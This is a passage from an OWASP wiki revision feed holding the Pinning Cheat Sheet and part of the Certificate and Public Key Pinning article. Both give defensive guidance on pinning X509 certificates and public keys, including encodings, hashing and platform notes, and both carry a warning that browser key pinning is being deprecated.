* OWASP [[Transport_Layer_Protection_Cheat_Sheet|Transport Layer Protection Cheat Sheet]]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc1421.txt RFC 1421 (PEM Encoding)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4648.txt RFC 4648 (Base16, Base32, and Base64 Encodings)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5280.txt RFC 5280 (Internet X.509, PKIX)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc3279.txt RFC 3279 (PKI, X509 Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4055.txt RFC 4055 (PKI, X509 Additional Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc2246.txt RFC 2246 (TLS 1.0)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4346.txt RFC 4346 (TLS 1.1)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5246.txt RFC 5246 (TLS 1.2)]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2125 PKCS#1, RSA Encryption Standard]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2128 PKCS#6, Extended-Certificate Syntax Standard]&lt;br /&gt;
&lt;br /&gt;
= Authors and Editors  =&lt;br /&gt;
&lt;br /&gt;
* Jeffrey Walton - jeffrey, owasp.org&lt;br /&gt;
* John Steven - john, owasp.org&lt;br /&gt;
* Jim Manico - jim, owasp.org&lt;br /&gt;
* Kevin Wall - kevin, owasp.org&lt;br /&gt;
* Ricardo Iramar - ricardo.iramar@gmail.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Category:Cheatsheets]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Pinning_Cheat_Sheet&amp;diff=234783</id>
		<title>Pinning Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Pinning_Cheat_Sheet&amp;diff=234783"/>
				<updated>2017-10-31T14:36:30Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: warn that HPKP is being removed from browsers&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;background-color:yellow&amp;quot;&amp;gt;'''Warning:''' Key pinning will be [https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ deprecated in Chrome as of May 2018]. Use of key pinning is no longer recommended. Consider using [https://www.certificate-transparency.org/ Certificate Transparency] instead.&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Introduction  =&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
The [[Pinning Cheat Sheet]] is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter's presentation [[Media:Securing-Wireless-Channels-in-the-Mobile-Space.ppt|Securing Wireless Channels in the Mobile Space]]. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability.&lt;br /&gt;
&lt;br /&gt;
A verbose article is available at [[Certificate_and_Public_Key_Pinning|Certificate and Public Key Pinning]]. The article includes additional topics, such as Alternatives to Pinning, Ephemeral Keys, Pinning Gaps, Revocation, and X509 Validation.&lt;br /&gt;
&lt;br /&gt;
== What's the problem? ==&lt;br /&gt;
&lt;br /&gt;
Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.&lt;br /&gt;
&lt;br /&gt;
== What Is Pinning? ==&lt;br /&gt;
&lt;br /&gt;
Pinning is the process of associating a host with their ''expected'' X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a ''pinset'' (taking from [https://developers.google.com/events/io/sessions/gooio2012/107/ Jon Larimer and Kenny Root Google I/O talk]). In this case, the advertised identity must match one of the elements in the pinset.&lt;br /&gt;
&lt;br /&gt;
A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since ''preloading'' the certificate or public key ''out of band'' usually means the attacker cannot taint the pin.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Whitelist? ===&lt;br /&gt;
&lt;br /&gt;
If you are working for an organization which practices &amp;quot;egress filtering&amp;quot; as part of a Data Loss Prevention (DLP) strategy, you will likely encounter ''Interception Proxies''. I like to refer to these things as '''&amp;quot;good&amp;quot; bad guys''' (as opposed to '''&amp;quot;bad&amp;quot; bad guys''') since both break end-to-end security and we can't tell them apart. In this case, '''do not''' offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being '''instructed''' to do so by the folks in Risk Acceptance.&lt;br /&gt;
&lt;br /&gt;
=== How Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
The idea is to re-use the exiting protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.&lt;br /&gt;
&lt;br /&gt;
To harden the channel, the program would take advantage of the &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key.&lt;br /&gt;
&lt;br /&gt;
== What Should Be Pinned? ==&lt;br /&gt;
&lt;br /&gt;
The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin  the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt;; or (b) pin one of the concrete types such as &amp;lt;tt&amp;gt;RSAPublicKey&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;DSAPublicKey&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
[[File:random-org-der-dump.png|thumb| 100px |subjectPublicKeyInfo]]The three choices are explained below in more detail. I would encourage you to pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt; because it has the public parameters (such as &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; for an RSA public key) '''and''' contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and the figure to the right shows the additional information available.&lt;br /&gt;
&lt;br /&gt;
=== Certificate ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-cert.png|thumb|right|100px|Certificate]] The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use &amp;lt;tt&amp;gt;openssl s_client&amp;lt;/tt&amp;gt; to retrieve the certificate etc. At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function. &lt;br /&gt;
&lt;br /&gt;
There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.&lt;br /&gt;
&lt;br /&gt;
=== Public Key ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-pubkey.png|thumb|right|100px|Public Key]] Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.&lt;br /&gt;
&lt;br /&gt;
There are two downsides to public key pinning. First, it's harder to work with keys (versus certificates) since you must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, buts it's uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.&lt;br /&gt;
&lt;br /&gt;
=== Hashing ===&lt;br /&gt;
&lt;br /&gt;
While the three choices above used DER encoding, its also acceptable to use a hash of the information. In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like &amp;lt;tt&amp;gt;dumpasn1&amp;lt;/tt&amp;gt; and other ASN.1 decoders.&lt;br /&gt;
&lt;br /&gt;
Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if you application is concerned about leaking information during decompilation and re-engineering. Second, a digested certificate fingerprint is often available as a native API for many libraries, so its convenient to use.&lt;br /&gt;
&lt;br /&gt;
Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google's IETF draft ''websec-key-pinning'' uses the technique.&lt;br /&gt;
&lt;br /&gt;
== Examples of Pinning ==&lt;br /&gt;
&lt;br /&gt;
This section discusses certificate and public key pinning in Android Java, iOS, .Net, and OpenSSL. Code has been omitted for brevity, but the key points for the platform are highlighted. All programs attempt to connect to [https://www.random.org random.org] and fetch bytes (Dr. Mads Haahr participates in AOSP's pinning program, so the site should have a static key). The programs enjoy a pre-existing relationship with the site (more correctly, ''a priori'' knowledge), so they include a copy of the site's public key and pin the identity on the key.&lt;br /&gt;
&lt;br /&gt;
=== Android ===&lt;br /&gt;
&lt;br /&gt;
This example is using the concept from [https://developer.android.com/training/articles/security-ssl.html#UnknownCa developer.android.com unknown CA implementation document]. Basically you can teach HttpsURLConnection to trust a specific set of CAs.&lt;br /&gt;
&lt;br /&gt;
Download: [https://github.com/riramar/pubkey-pin-android Android app pubkey-pin-android]&lt;br /&gt;
&lt;br /&gt;
=== iOS ===&lt;br /&gt;
&lt;br /&gt;
An open-source SSL pinning library for iOS and OS X was released at Black Hat 2015, which provides an easy-to-use API for deploying pinning within an App: https://github.com/datatheorem/TrustKit .&lt;br /&gt;
&lt;br /&gt;
Otherwise and when using NSURLConnection, iOS pinning is performed through a &amp;lt;tt&amp;gt;NSURLConnectionDelegate&amp;lt;/tt&amp;gt;. The delegate must implement &amp;lt;tt&amp;gt;connection:canAuthenticateAgainstProtectionSpace:&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;. Within &amp;lt;tt&amp;gt;connection:didReceiveAuthenticationChallenge:&amp;lt;/tt&amp;gt;, the delegate must call &amp;lt;tt&amp;gt;SecTrustEvaluate&amp;lt;/tt&amp;gt; to perform customary X509 checks.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-ios.zip|iOS sample program]].&lt;br /&gt;
&lt;br /&gt;
=== .Net ===&lt;br /&gt;
&lt;br /&gt;
.Net pinning can be achieved by using &amp;lt;tt&amp;gt;ServicePointManager&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-dotnet.zip|.Net sample program]].&lt;br /&gt;
&lt;br /&gt;
=== OpenSSL ===&lt;br /&gt;
&lt;br /&gt;
Pinning can occur at one of two places with OpenSSL. First is the user supplied &amp;lt;tt&amp;gt;verify_callback&amp;lt;/tt&amp;gt;. Second is after the connection is established via &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt;. Either method will allow you to access the peer's certificate.&lt;br /&gt;
&lt;br /&gt;
Though OpenSSL performs the X509 checks, you must fail the connection and tear down the socket on error. By design, a server that does not supply a certificate will result in &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt; with a '''NULL''' certificate. To check the result of the customary verification: (1) you must call &amp;lt;tt&amp;gt;SSL_get_verify_result&amp;lt;/tt&amp;gt; and verify the return code is &amp;lt;tt&amp;gt;X509_V_OK&amp;lt;/tt&amp;gt;; and (2) you must call &amp;lt;tt&amp;gt;SSL_get_peer_certificate&amp;lt;/tt&amp;gt; and verify the certificate is '''non-NULL'''.&lt;br /&gt;
&lt;br /&gt;
Download: [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* OWASP [[Injection_Theory|Injection Theory]]&lt;br /&gt;
* OWASP [[Data_Validation|Data Validation]]&lt;br /&gt;
* OWASP [[Transport_Layer_Protection_Cheat_Sheet|Transport Layer Protection Cheat Sheet]]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc1421.txt RFC 1421 (PEM Encoding)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4648.txt RFC 4648 (Base16, Base32, and Base64 Encodings)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5280.txt RFC 5280 (Internet X.509, PKIX)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc3279.txt RFC 3279 (PKI, X509 Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4055.txt RFC 4055 (PKI, X509 Additional Algorithms and CRL Profiles)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc2246.txt RFC 2246 (TLS 1.0)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc4346.txt RFC 4346 (TLS 1.1)]&lt;br /&gt;
* IETF [http://www.ietf.org/rfc/rfc5246.txt RFC 5246 (TLS 1.2)]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2125 PKCS#1, RSA Encryption Standard]&lt;br /&gt;
* RSA Laboratories [http://www.rsa.com/rsalabs/node.asp?id=2128 PKCS#6, Extended-Certificate Syntax Standard]&lt;br /&gt;
&lt;br /&gt;
= Authors and Editors  =&lt;br /&gt;
&lt;br /&gt;
* Jeffrey Walton - jeffrey, owasp.org&lt;br /&gt;
* John Steven - john, owasp.org&lt;br /&gt;
* Jim Manico - jim, owasp.org&lt;br /&gt;
* Kevin Wall - kevin, owasp.org&lt;br /&gt;
* Ricardo Iramar - ricardo.iramar@gmail.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Category:Cheatsheets]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&amp;diff=234782</id>
		<title>Certificate and Public Key Pinning</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Certificate_and_Public_Key_Pinning&amp;diff=234782"/>
				<updated>2017-10-31T14:34:47Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: warn that HPKP is being removed from browsers&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;span style=&amp;quot;background-color:yellow&amp;quot;&amp;gt;'''Warning:''' Key pinning will be [https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ deprecated in Chrome as of May 2018]. Use of key pinning is no longer recommended. Consider using [https://www.certificate-transparency.org/ Certificate Transparency] instead.&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Certificate and Public Key Pinning]] is a technical guide to implementing certificate and public key pinning as discussed at the ''[https://www.owasp.org/index.php/Virginia Virginia chapter's]'' presentation [[Media:Securing-Wireless-Channels-in-the-Mobile-Space.ppt|Securing Wireless Channels in the Mobile Space]]. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability. Additional presentation material included [[Media:pubkey-pin-supplement.pdf|supplement with code excerpts]], [[Media:pubkey-pin-android.zip|Android sample program]], [[Media:pubkey-pin-ios.zip|iOS sample program]], [[Media:pubkey-pin-dotnet.zip|.Net sample program]], and [[Media:pubkey-pin-openssl.zip|OpenSSL sample program]].&lt;br /&gt;
&lt;br /&gt;
A cheat sheet is available at [[Pinning_Cheat_Sheet|Pinning Cheat Sheet]].&lt;br /&gt;
&lt;br /&gt;
== Introduction == &lt;br /&gt;
&lt;br /&gt;
Secure channels are a cornerstone to users and employees working remotely and on the go. Users and developers expect end-to-end security when sending and receiving data - especially sensitive data on channels protected by VPN, SSL, or TLS. While organizations which control DNS and CA have likely reduced risk to trivial levels under most threat models, users and developers subjugated to other's DNS and a public CA hierarchy are exposed to non-trivial amounts of risk. In fact, history has shown those relying on outside services have suffered chronic breaches in their secure channels.&lt;br /&gt;
&lt;br /&gt;
The pandemic abuse of trust has resulted in users, developers and applications making security related decisions on untrusted input. The situation is somewhat of a paradox: entities such as DNS and CAs are trusted and supposed to supply trusted input; yet their input cannot be trusted. Relying on untrusted input for security related decisions is not only bad karma, it violates a number of secure coding principals (see, for example, OWASP's [[Injection Theory]] and [[Data Validation]]).&lt;br /&gt;
&lt;br /&gt;
Pinning effectively removes the &amp;quot;conference of trust&amp;quot;. An application which pins a certificate or public key no longer needs to depend on others - such as DNS or CAs - when making security decisions relating to a peer's identity. For those familiar with SSH, you should realize that public key pinning is nearly identical to SSH's &amp;lt;tt&amp;gt;StrictHostKeyChecking&amp;lt;/tt&amp;gt; option. SSH had it right the entire time, and the rest of the world is beginning to realize the virtues of directly identifying a host or service by its public key.&lt;br /&gt;
&lt;br /&gt;
Others who actively engage in pinning include Google and its browser Chrome. Chrome was successful in detecting the DigiNotar compromise which uncovered suspected interception by the Iranian government on its citizens. The initial report of the compromise can be found at ''[https://productforums.google.com/d/topic/gmail/3J3r2JqFNTw/discussion Is This MITM Attack to Gmail's SSL?]''; and Google Security's immediate response at ''[https://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html An update on attempted man-in-the-middle attacks]''.&lt;br /&gt;
&lt;br /&gt;
== What's the problem? ==&lt;br /&gt;
&lt;br /&gt;
Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.&lt;br /&gt;
&lt;br /&gt;
Examples of past failures are listed on the discussion tab for this article. This cheat sheet does not attempt to catalogue the failures in the industry, investigate the design flaws in the scaffolding, justify the lack of accountability or liability with the providers, explain the race to the bottom in services, or demystify the collusion between, for example, Browsers and CAs. For additional reading, please visit ''[http://www.cs.auckland.ac.nz/~pgut001/pubs/pkitutorial.pdf PKI is Broken]'' and ''[http://blog.cryptographyengineering.com/2012/02/how-to-fix-internet.html The Internet is Broken]''.&lt;br /&gt;
&lt;br /&gt;
=== Patient 0 ===&lt;br /&gt;
&lt;br /&gt;
The original problem was the ''Key Distribution Problem''. Insecure communications can be transformed into a secure communication problem with encryption. Encrypted communications can be transformed into an identity problem with signatures. The identity problem terminates at the key distribution problem. They are the same problem.&lt;br /&gt;
&lt;br /&gt;
=== The Cures ===&lt;br /&gt;
&lt;br /&gt;
There are three cures for the key distribution problem. First is to have first hand knowledge of your partner or peer (i.e., a peer, server or service). This could be solved with SneakerNet. Unfortunately, SneakerNet does not scale and cannot be used to solve the key distribution problem.&lt;br /&gt;
&lt;br /&gt;
The second is to rely on others, and it has two variants: (1) web of trust, and (2) hierarchy of trust. Web of Trust and Hierarchy of Trust solve the key distribution problem in a sterile environment. However, Web of Trust and Hierarchy of Trust each requires us to rely on others - or '''confer trust'''. In practice, trusting others is showing to be problematic.&lt;br /&gt;
&lt;br /&gt;
== What Is Pinning? ==&lt;br /&gt;
&lt;br /&gt;
Pinning is the process of associating a host with their ''expected'' X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or 'pinned' to the host. If more than one certificate or public key is acceptable, then the program holds a ''pinset'' (taking from [https://developers.google.com/events/io/sessions/gooio2012/107/ Jon Larimer and Kenny Root Google I/O talk]). In this case, the advertised identity must match one of the elements in the pinset.&lt;br /&gt;
&lt;br /&gt;
A host or service's certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former - adding at development time - is preferred since ''preloading'' the certificate or public key ''out of band'' usually means the attacker cannot taint the pin. If the certificate or public key is added upon first encounter, you will be using ''key continuity''. Key continuity can fail if the attacker has a privileged position during the first encounter.&lt;br /&gt;
&lt;br /&gt;
Pinning leverages knowledge of the pre-existing relationship between the user and an organization or service to help make better security related decisions. Because you already have information on the server or service, you don't need to rely on generalized mechanisms meant to solve the ''key distribution'' problem. That is, you don't need to turn to DNS for name/address mappings or CAs for bindings and status. One exception is revocation and it is discussed below in [[#Pinning_Gaps|Pinning Gaps]].&lt;br /&gt;
&lt;br /&gt;
It is also worth mention that Pinning is not Stapling. Stapling sends both the certificate and  OCSP responder information in the same request to avoid the additional fetches the client should perform during path validations.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
You should pin anytime you want to be relatively certain of the remote host's identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.&lt;br /&gt;
&lt;br /&gt;
A perfect case in point: during the two weeks or so of preparation for the presentation and cheat sheet, we've observed three relevant and related failures. First was [http://gaurangkp.wordpress.com/2013/01/09/nokia-https-mitm/ Nokia/Opera willfully breaking the secure channel]; second was [http://blog.malwarebytes.org/intelligence/2013/02/digital-certificates-and-malware-a-dangerous-mix/ DigiCert issuing a code signing certificate for malware]; and third was [http://krebsonsecurity.com/2013/02/security-firm-bit9-hacked-used-to-spread-malware/ Bit9's loss of its root signing key]. The environment is not only hostile, it's toxic.&lt;br /&gt;
&lt;br /&gt;
=== When Do You Whitelist? ===&lt;br /&gt;
&lt;br /&gt;
If you are working for an organization which practices &amp;quot;egress filtering&amp;quot; as part of a Data Loss Prevention (DLP) strategy, you will likely encounter ''Interception Proxies''. I like to refer to these things as '''&amp;quot;good&amp;quot; bad guys''' (as opposed to '''&amp;quot;bad&amp;quot; bad guys''') since both break end-to-end security and we can't tell them apart. In this case, '''do not''' offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy's public key to your pinset after being '''instructed''' to do so by the folks in Risk Acceptance.&lt;br /&gt;
&lt;br /&gt;
Note: if you whitelist a certificate or public key for a different host (for example, to accommodate an interception proxy), you are no longer pinning the expected certificates and keys for the host. Security and integrity on the channel could suffer, and it surely breaks end-to-end security expectations of users and organizations.&lt;br /&gt;
&lt;br /&gt;
For more reading on interception proxies, the additional risk they bestow, and how they fail, see Dr. Matthew Green's ''[http://blog.cryptographyengineering.com/2012/03/how-do-interception-proxies-fail.html How do Interception Proxies fail?]'' and Jeff Jarmoc's BlackHat talk ''[https://www.blackhat.com/html/bh-eu-12/bh-eu-12-archives.html#jarmoc SSL/TLS Interception Proxies and Transitive Trust]''.&lt;br /&gt;
&lt;br /&gt;
=== How Do You Pin? ===&lt;br /&gt;
&lt;br /&gt;
The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.&lt;br /&gt;
&lt;br /&gt;
To harden the channel, the program would take advantage of the &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback offered by a library, framework or platform. In the callback, the program would verify the remote host's identity by validating its certificate or public key. While pinning does not have to occur in an &amp;lt;tt&amp;gt;OnConnect&amp;lt;/tt&amp;gt; callback, its often most convenient because the underlying connection information is readily available.&lt;br /&gt;
&lt;br /&gt;
== What Should Be Pinned? ==&lt;br /&gt;
&lt;br /&gt;
The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin  the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt;; or (b) pin one of the concrete types such as &amp;lt;tt&amp;gt;RSAPublicKey&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;DSAPublicKey&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
The three choices are explained below in more detail. I would encourage you to pin the &amp;lt;tt&amp;gt;subjectPublicKeyInfo&amp;lt;/tt&amp;gt; because it has the public parameters (such as &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; for an RSA public key) '''and''' contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and Figure 1 below shows the additional information available.&lt;br /&gt;
&lt;br /&gt;
=== Encodings/Formats ===&lt;br /&gt;
&lt;br /&gt;
For the purposes of this article, the objects are in X509-compatible presentation format (PKCS#1 defers to X509, both of which use ASN.1). If you have a PEM encoded object (for example, &amp;lt;tt&amp;gt;-----BEGIN CERTIFICATE-----&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;-----END CERTIFICATE-----&amp;lt;/tt&amp;gt;), then convert the object to DER encoding. Conversion using OpenSSL is offered below in [[#Format_Conversions|Format Conversions]].&lt;br /&gt;
&lt;br /&gt;
A certificate is an object which binds an entity (such as a person or organization) to a public key via a signature. The certificate is DER encoded, and has associated data or attributes such as ''Subject'' (who is identified or bound), ''Issuer'' (who signed it), ''Validity'' (''NotBefore'' and ''NotAfter''), and a ''Public Key''.&lt;br /&gt;
&lt;br /&gt;
A certificate has a ''subjectPublicKeyInfo''. The subjectPublicKeyInfo is a key with additional information. The ASN.1 type includes an ''Algorithm ID'', a ''Version'', and an extensible format to hold a concrete public key. Figures 1 and 2 below show different views of the same RSA key, which is the subjectPublicKeyInfo. The key is for the site [https://www.random.org random.org], and it is used in the sample programs and listings below.&lt;br /&gt;
&lt;br /&gt;
{| align=&amp;quot;center&amp;quot;&lt;br /&gt;
| [[File:random-org-der-dump.png|thumb|375px|Figure 1: subjectPublicKeyInfo dumped with dumpans1]]&lt;br /&gt;
| [[File:random-org-der-hex.png|thumb|375px|Figure 2: subjectPublicKeyInfo under a hex editor]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
The concrete public key is an encoded public key. The key format will usually be specified elsewhere - for example, PKCS#1 in the case of RSA Public Keys. In the case of an RSA public key, the type is ''RSAPublicKey'' and the parameters &amp;lt;tt&amp;gt;{e,n}&amp;lt;/tt&amp;gt; will be ASN.1 encoded. Figures 1 and 2 above clearly show the modulus (''n'' at line 28) and exponent (''e'' at line 289). For DSA, the concrete type is DSAPublicKey and the ASN.1 encoded parameters would be &amp;lt;tt&amp;gt;{p,q,g,y}&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Final takeaways: (1) a certificate binds an entity to a public key; (2) a certificate has a subjectPublicKeyInfo; and (3) a subjectPublicKeyInfo has an concrete public key. For those who want to learn more, a more in-depth discussion from a programmer's perspective can be found at the Code Project's article ''[http://www.codeproject.com/Articles/25487/Cryptographic-Interoperability-Keys Cryptographic Interoperability: Keys]''.&lt;br /&gt;
&lt;br /&gt;
=== Certificate ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-cert.png|thumb|right|100px|Certificate]] The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use &amp;lt;tt&amp;gt;openssl s_client&amp;lt;/tt&amp;gt; to retrieve the certificate etc. When the certificate expires, you would update your application. Assuming your application has no bugs or security defects, the application would be updated every year or two.&lt;br /&gt;
&lt;br /&gt;
At runtime, you retrieve the website or server's certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function. &lt;br /&gt;
&lt;br /&gt;
There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.&lt;br /&gt;
&lt;br /&gt;
=== Public Key ===&lt;br /&gt;
&lt;br /&gt;
[[File:pin-pubkey.png|thumb|right|100px|Public Key]] Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.&lt;br /&gt;
&lt;br /&gt;
There are two downsides two public key pinning. First, its harder to work with keys (versus certificates) since you usually must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, buts its uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.&lt;br /&gt;
&lt;br /&gt;
=== Hashing ===&lt;br /&gt;
&lt;br /&gt;
While the three choices above used DER encoding, its also acceptable to use a hash of the information (or other transforms). In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like &amp;lt;tt&amp;gt;dumpasn1&amp;lt;/tt&amp;gt; and other ASN.1 decoders.&lt;br /&gt;
&lt;br /&gt;
Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if you application is concerned about leaking information during decompilation and re-engineering.&lt;br /&gt;
&lt;br /&gt;
Second, a digested certificate fingerprint is often available as a native API for many libraries, so its convenient to use.&lt;br /&gt;
&lt;br /&gt;
Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google's IETF draft ''websec-key-pinning'' uses the technique.&lt;br /&gt;
